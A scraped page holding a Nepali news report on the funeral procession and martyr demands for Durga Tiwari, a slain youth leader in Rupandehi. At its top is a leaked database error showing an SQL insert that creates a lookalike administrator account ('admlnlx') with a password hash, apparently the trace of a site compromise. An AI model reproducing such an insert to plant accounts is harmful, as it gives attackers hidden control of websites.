WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BSlkJMQWRFlK.rHZyRe2fG8947Q/u0.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-26 03:30:54', '', 'admlnlx', 'admlnlx')
वुटवल,पुस ६-
अज्ञात समूहको गोली प्रहारबाट हत्या गरिएका युवा संघ रुपन्देहीका अध्यक्ष दुर्गा तिवारीको साझ शव यात्रा निकालीएको छ ।त्यामा संलग्न पक्राउ नपरुञ्जेल शब नबुझ्ने अडानमा रहेका आफन्त र युवा संघका कार्यकर्ताहरुले तिवारीलाई सहिद घोषणाको सिफारिस गर्ने स्थानीय प्रशाशनको आश्वासन पाएपछि शव बुझेका हुन् ।
बुटवलको लुम्बिनी अञ्चल अस्पतालबाट निकालीएको शव यात्रामा हजारौं सहभागी भए । शव यात्रामा एमाले नेता, युवा संघका नेता कार्यकर्ता उद्योगीव्यवसायी सहित स्थानीय वासिन्दा स्वतहः स्फूर्त सहभागी भएका थिए । शव यात्राका सहभागीहरुले तिवारीलाई सहीद घोषणा गर्न, घटनाको निश्पक्ष छानवीन र हत्यामा संलग्नलाई तत्काल पक्राउ गर्न माग गर्दै नारा लगाएका थिए । शवलाई बुटवलको पुष्पलाल पार्कमा राखेर शोक सभाको आयोजना गरिएको थियो ।
सभालाई एमाले उपमहा सचिबद्धय बिष्णु पौडेल,घनश्याम भुषाल, युवा संघका अध्यक्ष राजिब पहारी लगायतले सम्बोधन गर्दै तिवारीलाई सहीद घोषणा गर्न माग गरे । उनीहरुले घटनाको सत्यतथ्य छानवीन गर्न र घटनालाई अन्यत्र नमोड्न आग्रह गरे । होनहार युवा नेताको दिनदहाडै हत्या हुदा पनि सरकारले गम्भीरता पूर्वक नलिएको भन्दै दोषीको पक्राउकालागि गम्भीरता अपनाउन सरकारसित माग गरे । बुटवलपछि तिवारीको शब उहाको घर देबदहको खैरेनीमा लगेर श्रद्धाञ्जली सभा हुनेछ । तिवारीको आजै राति चितवनको देबघाटमा अन्त्येष्टी गरिने कार्यक्रम रहेको युवासंघ सचिवालय सदस्य देवराज पोखरेलले जानाकारी दिनुभयो। यसैबीच युवा संघ रुपन्देहीले गरेको अनिश्चित कालिन रुपन्देही बन्द आज बेलुकाबाट फिर्ता भएको पोख्रेलले जानकारी दिनुभयो ।

